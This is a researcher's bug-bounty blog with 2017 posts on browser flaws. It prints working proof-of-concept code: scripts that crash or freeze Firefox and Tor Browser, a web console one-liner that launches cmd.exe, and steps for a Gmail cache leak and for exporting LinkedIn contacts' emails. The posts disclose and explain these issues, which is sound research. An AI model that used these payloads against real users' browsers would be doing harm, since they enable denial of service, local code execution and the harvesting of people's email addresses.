Pageviews

Monday, 27 November 2017

Go ahead and get "email” of all your LinkedIn connections

Hi Internet,

Got, something amazing today @LinkedIn but I believe its more of a privacy issue rather than security or might be a functionality :/

Have you ever wonder, how you get spam mails or phishing,

You: I have no idea how attacker got my email address.

So, this might be one of the case.

Here is how you can export  connections details from your LinkedIn account,

Visit this link as a logged-in user, and it should look something like this.























Click on he radio button which as option "The works: All of the individual files plus more." and request for archive.

Just wait for few seconds and once done you will be able to download your archive, and you will be able to see something like this.



























Once, downloaded the archive file will have different things like,











Opening Connections.csv you may end up with getting all the details for your respective connections such as Name, Email Address, Company etc.





































Regards
Dhiraj


Tuesday, 24 October 2017

Tor Browser IPC crash at MOZ_CRASH()

Hi Internet,
 
IPC : Inter-process communication is a protocol short form of IPDL is a mozilla specific language to pass messages between  process and threads in secure way.

Note: Most of the IPC based crashes in browser is not eligible for BBB  //Not Sure

Snip Code :

<script>
function tor()
 {
 
    var uristring = unescape("%u4141%u4141");
     
    for(i=0; i <= 50 ; ++i)
 {
        uristring+=uristring;
        document.write(uristring);
    }   
    document.write(uristring);
}
</script>
</head>
<body onload="tor()">
</body>


Running the above code in TOR crashes the tab - 'Gah! This tab has crashed.

Running TOR in debug mode generated this below error :












So, this seems to be kind of a resource exhaustion attack that leads to a crash in TOR,  For instance if you try in a vanilla Firefox it freezes your page and if one disables multiprocess mode one can witness this behavior in a Tor Browser as well.

Running the snip code Asan build gets :



















Looking at the particular code you'll see:
#ifdef MOZ_CRASHREPORTER
      CrashReporter::AnnotateCrashReport(NS_LITERAL_CSTRING("IPCMessageName"), nsDependentCString(msg->name()));
      CrashReporter::AnnotateCrashReport(NS_LITERAL_CSTRING("IPCMessageSize"), nsPrintfCString("%d", msg->size()));
#endif
      MOZ_CRASH("IPC message size is too large");

So, what seems to be happening here is that without --disable-crashreporter (which is used for vanilla Firefox builds) the tab loading your code is stuck in the #ifdef MOZ_CRASHREPORTER block while Tor Browser (which uses --disable-crashreporter) is hitting the MOZ_CRASH() call directly.

This crashes at MOZ_CRASH() because IPC Message is too large. This issue was marked as informative  by TOR via H1


Monday, 24 April 2017

Navigating to non-same origin windows in browsers.

Lets do this.. Works almost in every browsers. Another Interesting Navigation trick. It is an little-known property of web browsers that one document can always navigate other, non-same-origin windows to arbitrary URLs. Perhaps more interestingly, you can also navigate third-party documents to resources served with Content-Disposition attachment, in which case, you get the original contents of the address bar, plus a rogue download prompt attached to an unsuspecting page that never wanted you to download that file.

Video POC :

No bounty was awarded, because :
"The behavioral of the browser is legit, the same thing happens in chrome or other browsers. We will invalidate your report."

Bug Reported by : Dhiraj Mishra  

Saturday, 4 March 2017

Firefox Webconsole allows arbitrary code to execute.

Lets do this....

Steps to Reproduce :

1. Open New Tab
2. Ctrl+Shft+K to open a console.
3. Run the following code on the Console

f=Components.classes['@mozilla.org/file/local;1'].createInstance(Components.interfaces.nsILocalFile);f.initWithPath('c:\\Windows\\System32\\cmd.exe');f.launch()

'about:newtab' is considered a chrome privileged page, injecting code within such a context would result in automatic RCE.

Video POC :



Bug Reported by : Dhiraj Mishra  

Thursday, 26 January 2017

Mozilla crashes at IPC via infinite redirects with long URL's

To easy.....

Steps to reproduce :

Paste the below code to OminiBox.

"data:text/html,<script>document.location += document.location +
document.location</script>"

The browser stops responding,  this kind of looping string-doubling attack usually gets killed by our out-of-memory detection.

Priority: -- → P3
Bug Reported by : Dhiraj Mishra

Tuesday, 24 January 2017

Tracking Airplanes via RTL-SDR

#Happiness 
Started with Tracking of Airplanes, very basics of RTL-SDR.
I hope my study goes till GSM Network Sniffing.
P.S : Hardik Mehta 

Wednesday, 18 January 2017

Mozilla Crashes at Inner Loop.

Lets get it done ....

Steps to Reproduce :

1. Open this link in Mozilla
2. Wait for a while, Mozilla will stop Not-Responding.

This happens because of the code given below :

 "  document.designMode="on";
  for(var i=0;i<100000;i++){
    document.execCommand("selectall");
    document.execCommand("bold",false,null);
    document.execCommand("insertHtml",false,"A");
  }"

Looks like that "selectall" registers runnable events for "selectionchange" but the selection has been already changed "insertHTML" and/or others when the runnable events try to dispatch selectionchange events , then tab becomes unresponsive.

Bug Reported by : Dhiraj Mishra 

Mozilla crashes at OOM.

Lets DOS Mozilla ....

Mozilla Crashes at [@ OOM | large | NS_ABORT_OOM | nsAString_internal::Replace ]

Steps to Reproduce :

1. Open Mozilla any version any platform.
2. Just paste the below code in the ominibox.

"data:text/html,<script>document.location += document.location +
document.location</script>
"

The browser gets hung and generates a Crash ID , mine was this.
It happens because Mozilla goes safe out of memory crash and nsPlainTextSerializer::AddToLine is using infallible string allocation.  

Bug reported by : Dhiraj Mishra 

Tuesday, 17 January 2017

Browser caching may hideout your Gmail privacy.

Lets make it simple....

Steps to Reproduce :

1. Login to your Gmail Account from "Mozilla"
2. Perform any dynamic activity.
3. Log Out (Do not Close the browser)

Now, lets view the "view-source" of Gmail from Mozilla.

Visit : view-source:https://mail.google.com/mail/u/0/

If everything went perfect, you should be able to view all the recent mails which was send and receive for that logged in user.

However when we reported this to Google this is what they replied :

Google :
Hello,

We've investigated and determined that this is a caching bug in Firefox. Firefox uses the cached version of a page when viewing the source, and it appears that Firefox is not respecting the caching headers that Gmail is sending. This isn't reproducible on Chrome,
which reloads a page when viewing the source.
You should be able to file a bug with Firefox at Bugzilla.Mozilla.org.


Regards,
Michael, Google Security Team
==

and when reported to Mozilla they removed the security flag from the bug by saying "this is not remotely exploitable"

Then again reverted back to Google and this is what they said :

Google :
 Hey,

Thanks for the bug report.

We've investigated your submission and made the decision not to track it as a security bug. It will also not be accepted as part of our VRP. Only first reports of technical security vulnerabilities that substantially affect the confidentiality or integrity of our users' data are in scope, and unfortunately we feel the issue you mention does not meet that bar :(

In order to conduct the attack the evildoer needs to reuse the same local user account. Because the operating systems themselves do not protect against attackers with this level of access, any fix we could implement would be easy to bypass, and we don't want to offer a false sense of security to our users. Check out https://sites.google.com/site/bughunteruniversity/nonvuln/attacks-working-only-when-sharing-local-account-with-the-attacker where we have written about this case.

If you think we've misunderstood, please do let us know!
==

It is a simple bug, that can have significant consequences, but google simply said,Who cares ?
Where Mozilla is still working on this.
Note: This works on all OS and any versions of Mozilla in Mobile as well.

Video POC :




Bug reported by : Sebastian Gr├╝nwald, Dhiraj Mishra, Japz Divino.